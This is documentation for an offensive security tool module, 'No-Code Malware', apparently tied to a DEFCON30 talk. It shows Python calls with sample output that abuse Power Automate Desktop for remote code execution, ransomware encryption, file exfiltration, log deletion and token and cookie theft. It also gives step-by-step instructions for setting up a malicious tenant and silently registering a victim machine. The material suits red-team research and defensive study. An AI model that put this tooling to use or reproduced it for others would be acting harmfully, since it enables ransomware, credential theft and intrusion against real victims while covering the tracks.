Modules: No‐Code Malware
Repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.
This capability was first presented at a DEFCON30 talk titled No-Code Malware - Windows 11 at Your Service:
from powerpwn.machinepwn.machine_pwn import MachinePwn
POST_URL = ""
pp = MachinePwn(post_url=POST_URL)
### code execution
# python2
pp.exec_py2("print('hello world')").cmd_code_execution
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')
# python2 bad syntax
pp.exec_py2("bad syntax").cmd_code_execution
# CodeExecOutputs(ScriptOutput='', ScriptError=' File "", line 1\r\n bad syntax\r\n ^\r\nSyntaxError: unexpected token \'syntax\'')
# powershell
pp.exec_ps("Write-Host \"hello word\"").cmd_code_execution
# commandline
pp.exec_cmd("echo \"hello word\"").cmd_code_execution
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')
### ransomware
pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").cmd_ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')
### exfiltration
pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").cmd_exfiltration
# ExfiltrationOutputs(Success=False, FileContents='')
### cleanup
pp.cleanup().cmd_cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)
### steal_power_automate_token
pp.steal_power_automate_token().cmd_steal_power_automate_token
# StealPowerAutomateTokenOutputs(Token='ey...')
### steal_cookie
pp.steal_cookie("https://www.google.com").cmd_steal_cookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')-
Set up your free Microsoft tenant by following Microsoft guidelines
-
Create a malicious user account and assign it a Power platform administrator role. The admin role isn't necessary, it's just convenient.
-
On a private browser tab
-
Go to https://flow.microsoft.com and log in with the malicious user. Follow through the sign-in process to initiate a Power Automate trial license.
-
Follow the same process with https://make.powerapps.com to initiate a Power Apps trial license.
-
-
Create a Service Principal by following Microsoft guidelines and note the tenantId, applicationId and secret.
-
Infect a test machine by following the How to infect a victim machine guide.
-
Verify that the machine has been onboarded
-
Log into https://flow.microsoft.com as the malicious user
-
Click Go to Monitor and then Machines and verify that the test victim machine is there
-
-
Log into https://flow.microsoft.com with the malicious user.
-
Go to Solutions and click Import solution
-
Zip the content of pwntoso_1_0_0_1 and select it when asked to provide a solution file. Follow the guided process to completion.
- When asked to provide a connection, following the guided process to create a new machine connection. Use the test victim machine credentials.
-
Go to My flows and search for Endpoint
Click on Edit and then on When a HTTP request is received and copy the URL under HTTP POST URL
-
Note the HTTP Post URL for use with the Python module.
To register a victim machine, recall the , and you got from following the cloud setup guide and run the following command
echo <secret> | C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe -register -applicationid <applicationId> -tenantid <tenantId> -clientsecret -force
That's it! For troubleshooting, refer to Microsoft Docs.
Got success=False with code=SessionExistsForTheUserWhenUnattended in unattendedError?
Got to Machines -> locate the machine -> three vertical dots -> Edit details -> Reuse sessions for unattended runs. See reuse sessions for unattended runs